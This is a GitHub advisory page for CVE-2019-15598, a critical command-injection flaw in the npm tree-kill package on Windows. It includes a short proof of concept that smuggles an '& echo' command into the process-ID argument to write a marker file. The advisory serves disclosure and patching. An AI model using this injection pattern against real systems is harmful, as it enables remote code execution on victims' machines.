Skip to content

Treekill Enables OS Command Injection

Critical severity GitHub Reviewed Published May 24, 2022 to the GitHub Advisory Database • Updated Apr 22, 2024

Package

npm tree-kill (npm)

Affected versions

< 1.2.2

Patched versions

1.2.2

Description

A Code Injection exists in treekill and tree-kill on Windows which allows a remote code execution when an attacker is able to control the input into the command.

Steps To Reproduce:

Create the following PoC file:

var kill = require('treekill');
kill('3333332 & echo "HACKED" > HACKED.txt & ');

Execute the following commands in terminal:

npm i treekill # Install affected module
dir # Check *HACKED.txt* doesn't exist
node poc.js #  Run the PoC
dir # Now *HACKED.txt* exists :)

The HACKED.txt has been created

References

Published by the National Vulnerability Database Dec 18, 2019
Published to the GitHub Advisory Database May 24, 2022
Reviewed Apr 22, 2024
Last updated Apr 22, 2024

Severity

Critical
9.8
/ 10

CVSS base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Weaknesses

CVE ID

CVE-2019-15598

GHSA ID

GHSA-j7fq-p9q7-5wfv
Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.